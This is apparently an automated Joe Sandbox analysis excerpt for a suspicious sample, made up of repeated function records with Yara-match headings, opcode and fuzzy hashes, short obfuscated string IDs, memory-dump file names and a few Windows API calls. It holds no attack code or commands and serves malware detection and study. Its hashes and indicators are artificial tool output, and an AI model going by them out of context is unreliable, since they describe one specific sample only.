                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: *B)$*B)$<=$O)O+$Q5Z7$T!M#$U1D3$V%G'$XY$\9X;$p-B/
                                                                                                                                                                                                                                                      • API String ID: 0-898000180
                                                                                                                                                                                                                                                      • Opcode ID: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
                                                                                                                                                                                                                                                      • Instruction ID: 602792c73b54732003b5b24363e79f64f49478adeaaf2d4803d9e71e80cf16d7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fc2874815f84d3ef4346084d008133ae0ec9231113661370af9e7ee02782906
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20C130B12483558BD714CF58D89266BB7F2EFD6714F08892CE4D68B390E739C902C79A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                      • API String ID: 0-2246970021
                                                                                                                                                                                                                                                      • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                      • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                      • API String ID: 0-2246970021
                                                                                                                                                                                                                                                      • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                      • Instruction ID: 76f3d7f5ccf1543d44577614d45da7e4976b274badc0cfa82ed2f213870f714d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 673242B0601B469FDB48CF26D580389BBB1FF45300F548698C9695FB5ADB35A892CFC0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                      • API String ID: 0-119712241
                                                                                                                                                                                                                                                      • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                      • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                      • API String ID: 0-1072848446
                                                                                                                                                                                                                                                      • Opcode ID: b818ee9c67694a0f4bc9b807532e0d54e79f31c8e805177f741268a403b11b31
                                                                                                                                                                                                                                                      • Instruction ID: 7f4f8c271271a0ee30063bf5d57d9afa0b4a7bb7edff0777766b2e5d54dfe869
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b818ee9c67694a0f4bc9b807532e0d54e79f31c8e805177f741268a403b11b31
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF22E17160C3A08FD320DF28D44436FBBE1ABD6314F598A2EE5D9873A1D77988458B4B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                      • API String ID: 0-1072848446
                                                                                                                                                                                                                                                      • Opcode ID: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                      • Instruction ID: 0b191b611bb53d4529df7f9175327bd40d8e79e8fb5d363c2397361c3d3e9bc0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e8ca45835480ccfa162dc2bafbba4cee2664ffe78ab865597f6f2298b61ffbe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3222AC7160C7948FD3208F28D4543AFBBE1AB86324F198A2DE5DA873D2D7798944CB43
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                      • API String ID: 0-2430453506
                                                                                                                                                                                                                                                      • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                      • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                      • API String ID: 0-3264166258
                                                                                                                                                                                                                                                      • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                      • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                      • API String ID: 0-3264166258
                                                                                                                                                                                                                                                      • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                      • Instruction ID: fce52cdd72706f7a587f8429cbc81167262e52e2a38572dad25c6059cdf86fe1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0B1E67120C3818BE368CF29D4917BBBBD2AFD2314F288A6DD4D98B2D1DB748549D712
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 009E8A1B
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 009E8A25
                                                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 009E8AC2
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 009E8AD7
                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 009E8BD9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4063528623-0
                                                                                                                                                                                                                                                      • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                      • Instruction ID: ef7a40f46a9cb615a4c7b50028157aeed0d4ef4162613356e07706d4e9977e88
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C417F77F4431807D71CAEB5CC5A3ABF69A9BC4314F0E803E6985AB391DD795C0552C1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                      • API String ID: 0-1001561910
                                                                                                                                                                                                                                                      • Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                      • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                      • API String ID: 0-3020956940
                                                                                                                                                                                                                                                      • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                      • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                      • API String ID: 0-3335612808
                                                                                                                                                                                                                                                      • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                      • Instruction ID: 3e4d8162ab823ddab49f3aca8ca3554a4605cc82d9188e49843d639c13767d20
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14D128B56083058BD724DF25C852B6BB7F2EFE2354F189A6CE4828B394F7799801C752
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                      • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                      • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                      • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                      • Instruction ID: 6de15b026c3c0c551e398de7a97834d79c157b0e992142c62b796d49845fa7b1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABA1E67120C3818BE368CF29D4917ABBBD2AFD2314F288A6DD4D98B2D1DB748549C716
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                      • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                      • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                      • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                      • Instruction ID: 312f19148a6f825f79c61a0cceee8a73f396470d77a60037c4003bdc57ba3b56
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04A1F77020C3818FE368CF29D4917ABBBD2AFD2314F288A6DD4D98B2D1DB748549C756
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                      • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                      • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                      • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                      • Instruction ID: 2ffc4a786623501b2fef63ef0f048efc71a5e76dafb917ffeba6edb4f5495709
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23A1E47010C3818EE324CF29D4917ABBBD2AFE2314F288A6DD4D98B2D1DB748449C752
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                      • API String ID: 0-979945983
                                                                                                                                                                                                                                                      • Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                      • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                      • API String ID: 0-3432275560
                                                                                                                                                                                                                                                      • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                      • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                      • API String ID: 0-3432275560
                                                                                                                                                                                                                                                      • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                      • Instruction ID: 03022165f29daa8035d9b9f980c6c7e1a02163e4c53b2e1f088b2fd4d2d53f36
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0742377050C3948FC725DF28C85077EBBE1AF92314F088A6CE9E54B3A2D7768906CB52
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
